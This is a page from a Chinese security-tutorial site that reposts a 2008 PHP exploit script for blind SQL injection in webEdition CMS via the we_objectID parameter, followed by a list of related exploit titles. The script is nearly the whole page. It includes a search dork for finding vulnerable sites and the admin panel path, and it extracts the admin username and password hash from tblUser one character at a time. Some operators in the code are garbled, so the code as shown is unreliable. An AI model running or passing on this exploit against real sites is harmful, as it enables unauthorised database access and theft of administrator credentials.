手机
当前位置:查字典教程网 >网络安全 >Exploit >webEdition CMS (we_objectID) Blind SQL Injection Exploit
webEdition CMS (we_objectID) Blind SQL Injection Exploit
摘要:

<?php

ini_set("max_execution_time",0);

print_r('

###############################################################

#

# WebEdition CMS - Blind SQL Injection Exploit

#

# Vulnerability discovered by: Lidloses_Auge

# Exploit coded by: Lidloses_Auge

# Special Greetz to: H4x0r007 (who sent me a vulnerable Page)

# Greetz to: -=Player=- , Suicide, g4ms3, enco,

# GPM, Free-Hack, Ciphercrew, h4ck-y0u

# Date: 20.08.2008

#

###############################################################

#

# Dork: inurl:we_objectID=

# Admin Panel: [Target]/webEdition/

# Usage: php '.$argv[0].' [Target] [Userid]

# Example for http://www.site.com/en/****.php?we_objectID=21

# => php '.$argv[0].' http://www.site.com/en/****.php?we_objectID=21 1

#

###############################################################

');

if ($argc > 1) {

$url = $argv[1];

if ($argc < 3) {

$userid = 1;

} else {

$userid = $argv[2];

}

$r = strlen(file_get_contents($url."'and 1=1/*"));

echo "nExploiting:n";

$w = strlen(file_get_contents($url."'and 1=0/*"));

$t = abs((100-($w/$r*100)));

echo "Password: ";

for ($j = 1; $j <= 32; $j ) {

for ($i = 46; $i <= 102; $i=$i 2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url."'and ascii(substring((select passwd from tblUser where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url."'and ascii(substring((select passwd from tblUser where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 102;

}

}

}

echo "nUsername: ";

for ($i=1; $i <= 30; $i ) {

$laenge = strlen(file_get_contents($url."'and ascii(substring((select username from tblUser where id=".$userid." limit 0,1),".$i.",1))!=0/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$count = $i;

$i = 30;

}

}

for ($j = 1; $j < $count; $j ) {

for ($i = 46; $i <= 122; $i=$i 2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url."'and ascii(substring((select username from tblUser where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url."'and ascii(substring((select username from tblUser where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 122;

}

}

} } else {

echo "nExploiting failed: Not enough arguments?n";

}

?>

【webEdition CMS (we_objectID) Blind SQL Injection Exploit】相关文章:

TGS CMS 0.3.2r2 Remote Code Execution Exploit

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

LoveCMS 1.6.2 Final Update Settings Remote Exploit

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

Maian Events 2.0 Insecure Cookie Handling Vulnerability

精品推荐
分类导航